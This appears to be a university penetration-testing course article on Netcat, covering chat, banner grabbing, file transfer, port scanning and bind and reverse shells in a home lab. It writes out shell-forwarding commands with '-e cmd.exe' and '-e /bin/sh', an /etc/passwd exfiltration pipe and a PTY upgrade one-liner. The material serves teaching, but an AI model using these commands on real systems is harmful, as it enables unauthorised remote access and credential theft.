Netcat
Introduction
The remote shells we have examined so far tend to be used for system admin purposes, and are unlikely to be the first part of any exploit (although if we can get user credentials, then connecting over a standard shell like SSH is incredibly useful).
In this article we look at Netcat, a tool for communicating over TCP/IP, that I have ended up using in almost every pentest or CTF I have been involved with.
What is Netcat?
Otherwise known as the 'Hackers' Swiss Army Knife', Netcat is a tool that allows us to create TCP based connections between various systems. Netcat can be used for almost any task that requires communication over a network including:
- Connecting to a remote server
- Transferring files
- Port scanning
- Banner grabbing
- Talking to services, such as mail servers.
- Browsing the web (this is awkward, but possible)
Netcat Versions
There are several versions of netcat available in Kali / Debian.
- Netcat traditional. (
nc
) - BSD Netcat (
nc
) - Netcat (
nc
) - ncat (
ncat
)
While the core functionality is the same, there are some slight differences.
- The standard netcat, and BSD netcat don't accept the -e parameter, so it doesn't support forwarding shells
- Netcat traditional does support forwarding commands
- ncat
ncat
supports forwarding, and also has features like encryption.
Personally, I prefer ncat, we get the same functionality, and I think the debugging output is clearer.
Important
Unless otherwise stated, we are going to use netcat / ncat interchangeably.
So the following commands are interchangeable.
# For netcat
$ nc
# For ncat
$ ncat
Installing Netcat
Netcat should be installed by default on Kali. You can check this by running :
$ncat --version
Ncat: Version 7.70 ( https://nmap.org/ncat )
If you get a response you are good to go. Otherwise install it using the Advanced Package Tool (APT).
For windows you can get a copy from https://nmap.org/ncat/. I would also recommend grabbing a copy of the statically compiled version, and keeping it. Having it there, ready to transfer to a windows box is useful in a lot of pentesting situations.
Note
Recently, Windows defender has started flagging Netcat as a malicious service. While they have (a bit of) a point, it sucks that such a useful tool for general network admin get blocked.
The ones on the Nmap site seem to work, but VMMV
Using Netcat as a simple chat service
For our first example we will make use of Netcat as a simple chat service between our windows and Kali machines. We are going to do the following:
- Set up a Netcat service listening on our windows machine (part 1)
- Connect to this from our Kali VM (part 2)
- Check it is working (part 3)
To set up Netcat to listen for incoming connections the command is:
$ nc -nvlp <port>
# or if using ncat
$ ncat -nvlp <port>
The flags are:
- n -- No DNS lookup
- v -- Verbose (give us loads of debugging info)
- l -- Listen for incoming connections
- p -- Port to listen on
To connect to a service using Netcat we can use $nc -nv <host> <port>
The n and v flags mean the same as for the listener.
Part 1: Set up the listener
On Windows open a Command terminal (run -> cmd.exe)
C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Part 2: set up the client
On your Linux system start a terminal window and run:
$ncat -nv 192.168.227.128 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.128:4444.
Part 3: Check connectivity
On the Windows box we should get a message about a new connection:
C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.227.1.
Ncat: Connection from 192.168.227.1:40786.
And when we type anything into the terminal, it should also appear on the other machine.
Video
A quick Asciinema demo of the above. The "local" is the top window, "remote" the bottom
Easytask
Use Netcat to replicate the chat example above, between your host and any VM's
- Connect from Windows to Linux
- Connect from Linux to Windows
Banner Grabbing with Netcat
Another useful thing we can do with netcat is use it for Banner Grabbing.
Many services will output a greeting or other information when you connect to them, for example a FTP service may display the message of the day.
Note
We will go into more detail in the Active Recon lecture, but we may as well keep all the netcat examples in the same place.
As netcat is used to connect two TCP endpoints, we can also use it for grabbing text based banners.
For example, connecting to a FTP service using netcat gives the following output.
# -n No DNS Lookup -v Verbose outut
$ ncat -nv 127.0.0.1 21
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:21.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 30 allowed.
220-Local time is now 22:09. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
From this we can identify the FTP service in use (pureFTP)
File Transfer using Netcat
We can also use netcat for some basic file transfers. This can be handy if we want a quick and dirty way of moving data between machines, and things like python or scp are not available.
Note
We will also go into Exfiltration in more detail later on.
To do this we can make use of IO redirection and / or pipes. (Remember that both Windows and Linux support IO redirection and pipes)
First we need to setup a netcat listener that will send its output to a file
ncat -nvlp 4444 > theFile
We can then send the file from the remote machine in a similar way
ncat -nv 127.0.0.1 4444 < theFile
# Alterntively
cat theFile | ncat -nv 127.0.0.1 4444
While this works well for small text based files, it can give us a problem with things like binary / executable files. This is because we are trying to send binary data over protocols that are designed for text.
We can work around this problem by encoding the data using a protocol such as Base64
On the listener we run can convert the file using base64
ncat -nvlp 4444 > theFile.b64
#And Decode
base64 -d theFile.b64 > theFile
On the sender we need a two stage process
# Encode the file using Base64
base64 /etc/passwd > passwd.b64
ncat -nvlp 4444 < passwd.b64
Tip
We can also do it as a one liner at both ends
Listener
Sncat -nvlp 4444 | base64 -d > tmp.txt
Sender
$ base64 /etc/passwd | ncat -nv 127.0.0.1 4444
Task
We can use any function that can be piped here.
Spend some time and research how to:
- Use Compression (like Tar / Zip)
- Do the Base64 encoding on Windows systems.
Using Netcat to create a reverse shell
Netcat also lets us connect to other processes and send their data across the network. We can use this to get a basic reverse shell on a remote system.
Note
Not all versions of Netcat allow this; for example nc on Debian systems stops a shell being forwarded. But nc.traditional will allow it to work. If you are unlucky enough to have a version that will not forward the shell, you will have to find another way of creating the service on the target. However, you can still use Netcat on your machine to connect to any TCP based shell.
To do this we use the -e (execute) option, and pass it the command we want to run.
Remember this will be different depending on your target architecture:
- If it's a windows box we can pass cmd.exe
- For Linux systems /bin/sh is a good option
Let's demo setting up a simple Bind shell to connect to our windows machine from Linux.
Bind shell: Windows Target, Linux local machine.
We start a Netcat server as before, but this time connect it to a cmd.exe process.
C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444 -e cmd.exe
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
On our Linux box we simply connect to the Netcat service as before. However, this time the command prompt is forwarded to us, and we can run shell commands.
$ncat -nv 192.168.227.128 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.128:4444.
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Dan Goldsmith>dir
dir
Volume in drive C has no label.
Volume Serial Number is 62FE-ACF3
Directory of C:\Users\Dan Goldsmith
04/16/2019 12:25 PM <DIR> .
04/16/2019 12:25 PM <DIR> ..
11/29/2018 12:53 PM <DIR> .idlerc
03/04/2019 04:25 PM <DIR> .local
------ 8<----- SNIP ------
Bind shell: Linux Target, Windows host
Let's swap this around, and see what happens when we setup a bind shell on our Linux box, and connect to it via windows.
On our Linux system we run almost the same command as before, but this time use /bin/sh as the process to connect to:
$ncat -nvlp 4444 -e /bin/sh
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
And on Windows we can connect back with:
C:\Users\Dan Goldsmith>ncat.exe -nv 192.168.227.1 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.1:4444.
whoami
dang
You will notice that the output from Linux systems loses formatting. This is due to the way the /bin/sh works; while it's ugly, we can still run most of the commands we would normally.
This is the same problem we had when running commands with SSH. The Linux shell expects to be running in a TTY, and we lose some functionality.
Tip
If you really can't stand the formatting, we can use python (if it is available) to give us a slightly nicer shell. Its not quite a fully featured shell, but it helps with some of the more irritating issues.
The Python PTY library, can be used to add some of the terminal like capabilities.
We can use the one-liner
python -c "import pty; pty.spawn('/bin/bash')"
to give us a Bash(like) shell.
Bind Shell: Video
This time we create a bind shell on the remote (bottom) of the screen.
The remote opens a netcat listener and pipes its data to /bin/sh
We can then connect to this on the local machine (top), and execute some simple Linux commands.
Reverse Shells
Remember, with a reverse shell we get the target to connect and forward the shell to us. If we are taking this approach, we need to set things up in a different order, by getting the listener up and running first.
As an example, let's set up a remote shell from our Windows machine to the Linux box.
We first set up a listener on Linux:
$ncat -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
We then connect to this using Windows, with the -e option to forward a shell
C:\Users\Dan Goldsmith>ncat.exe -nv 192.168.227.1 4444 -e cmd.exe
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.1:4444.
We can see the connection coming into our Linux box, and the shell being forwarded:
$ncat -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.227.128.
Ncat: Connection from 192.168.227.128:50973.
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Dan Goldsmith>
Reverse Shell Video
In this video we create a reverse shell
- The local service (top) opens a netcat listener
- The remote service connects to it and forwards a
/bin/sh
shell
Task
For the lab activities we will look at using Netcat for both Bind and Remote shells.
- Create a bind shell listener on both windows and Linux then connect to it from the other machine
- Create a listener on both Windows and Linux and connect to it.
Netcat for Recon
Tools like Nmap are a core part of our toolkit, essential for the recon process. However, they may not be available.
We can make use of Netcat as a "poor mans nmap" to give us an idea of what hosts are available on a network, or what ports are open.
Important
This is one Instance where the older nc
is better than ncat
The less verbose debugging output, makes things clearer
also ncat doesn't support port ranges by default
Netcat port scan
To use netcat as a basic port scanner we can use the use the -z
flag.
This tells netcat to report if it can connect to a remote service, and close
the connection without sending any data.
To scan a single port we can use $ nc -zv <host> <port>
:
For example to scan the open port 80. Notice we also get DNS resolution if we do not specify the -n flag.
$ nc -zv 127.0.0.1 80
gogs.comsec [127.0.0.1] 80 (http) open
If the port is closed we get the following
$ nc -zv 127.0.0.1 81
gogs.comsec [127.0.0.1] 81: Connection refused
We can also scan a range of ports
$ nc -zv 127.0.0.1 1-1024
gogs.comsec [127.0.0.1] 21 (ftp) open
gogs.comsec [127.0.0.1] 25 (smtp) open
gogs.comsec [127.0.0.1] 80 (http) open
gogs.comsec [127.0.0.1] 242 (direct) open
We can also scan UDP ports with the same syntax and the -u
flag.
In summary
Netcat is an incredibly versatile tool that I use when dealing with remote shells in most pentest / CTFs. In this article we have discussed how to use Netcat to create and connect to remote shells.
While we tend to use it for grabbing shells, netcat is also useful for other common tasks like banner grabbing, file transfer and as a basic port scanning tool.
Other Netcat #morenetcat
I have covered some of the more common ways we can use netcat Is there anything you think I have missed that should be added (for example port forwarding, firewall evasion)?
What's your favourite trick with netcat?
Discuss on the aula, or get ready to talk about it in the lab session